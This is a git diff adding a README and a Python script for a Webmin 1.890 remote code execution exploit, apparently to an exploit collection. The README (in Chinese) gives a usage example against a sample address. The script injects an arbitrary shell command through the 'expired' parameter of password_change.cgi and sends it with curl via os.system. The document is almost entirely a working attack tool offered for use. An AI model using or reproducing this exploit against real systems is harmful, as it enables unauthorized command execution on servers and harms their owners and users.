diff --git a/CMS/Webmin/README.md b/CMS/Webmin/README.md
new file mode 100644
index 0000000..a31e5e9
--- /dev/null
+++ b/CMS/Webmin/README.md
@@ -0,0 +1,11 @@
+# Webmin 1.890 RCE
+
+## 供应链攻击的典型案例，值得收录
+
+### exp 使用
+```shell
+python3 exploit.py http://10.0.0.1:10000 id
+```
+
+服务器返回结果如下：
+![](images/服务器返回内容.png)
\ No newline at end of file
diff --git a/CMS/Webmin/exploit.py b/CMS/Webmin/exploit.py
new file mode 100644
index 0000000..5e2df5d
--- /dev/null
+++ b/CMS/Webmin/exploit.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+import os
+import sys
+
+
+STAIN = """
+WebMin 1.890-expired-remote-root
+"""
+usage = """Usage: python3 exploit.py target COMMAND
+
+Ex: python3 exploit.py http://10.0.0.1:10000 id
+                                                                                                                                   
+"""
+
+def exploit(target, url, command):
+    header = 'Referer: {}/session_login.cgi'.format(target)
+    payload = 'user=gotroot&pam=&expired=2|echo "";{}'.format(command)
+    os.system("curl -k {} -d '{}' -H '{}'".format(url,payload,header))
+
+
+if __name__ == '__main__':
+    try:
+        print(STAIN)
+        target = sys.argv[1].rstrip("/")
+        url = target+"/password_change.cgi"
+        command = sys.argv[2]
+        exploit(target, url, command)
+    except:
+        print(STAIN)
+        print(usage)
diff --git a/CMS/Webmin/images/服务器返回内容.png b/CMS/Webmin/images/服务器返回内容.png
new file mode 100644
index 0000000..965bf80
Binary files /dev/null and b/CMS/Webmin/images/服务器返回内容.png differ